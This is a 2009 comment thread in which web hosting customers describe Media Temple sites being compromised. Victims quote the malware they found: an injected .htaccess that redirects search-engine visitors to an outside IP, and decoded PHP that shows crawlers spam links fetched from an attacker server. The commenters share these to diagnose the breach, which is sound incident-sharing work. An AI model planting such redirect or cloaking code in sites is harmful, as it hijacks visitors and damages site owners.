Comments on: Site hacked – media temple’s reaction.

By: Kerri

Kerri — Wed, 25 Nov 2009 19:38:15 +0000

One of my client’s sites was hacked, too, and I’m no expert on internet security, but I do believe that there was nothing in the code that could have been exploited. This site used NO CMS, was and coded, had no forms, and the only PHP in was used for includes (headers, footers, etc.) and to parse a static XML file. This one seems to be totally on Media Temple.

By: Phil

Phil — Wed, 25 Nov 2009 00:02:01 +0000

Yep I was hacked too, all sites on my account had .htaccess changed or added :

AddHandler php-script .html .htm
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://91.207.4.19/tds/go.php?sid=1 [R,L]

And also ALL index.html and links.html files across all accounts had been changed.

On speaking with a tech at MT he was very hesitant to even mention the word hack or admit the fact, and only confirmed what I knew and would not explain anything at all. This is all very fishy!

By: Andreas

Andreas — Tue, 24 Nov 2009 09:16:36 +0000

My media temple sites were hacked too last night.
Got the same php code added to my index.php files, but the code never worked. Instead all requests returned with an error, which is not much better…

By: fwitz

fwitz — Mon, 23 Nov 2009 18:52:30 +0000

I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed. There’s no way the FTP passwords could have all been hacked.

The encoded PHP evaluates to this:

if(stripos($_SERVER['HTTP_USER_AGENT'], ‘google’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘yahoo’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘msn’) or stripos($_SERVER['HTTP_USER_AGENT'], ‘live’))
{
$r = ”;
if($f=@fsockopen(’91.207.4.18′,80,$e,$er,10) and @fputs($f, “GET /linkit/in.php?domain=” . urlencode($_SERVER["SERVER_NAME"]) . “&useragent=” . urlencode($_SERVER['HTTP_USER_AGENT']) . ” HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n”))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,”\r\n\r\n”); echo substr($r,$p+4);
}

By: cam

cam — Thu, 19 Nov 2009 12:41:46 +0000

In the meantime, whilst sitting tight, all our sites have porn links on them. Great!

By: Andrew

Andrew — Thu, 19 Nov 2009 03:16:16 +0000

Happened to me. Three less-than-important Drupal sites. I began evacuating the grid months ago.

By: Andrew

Andrew — Wed, 18 Nov 2009 19:29:24 +0000

We definitely appreciate the update.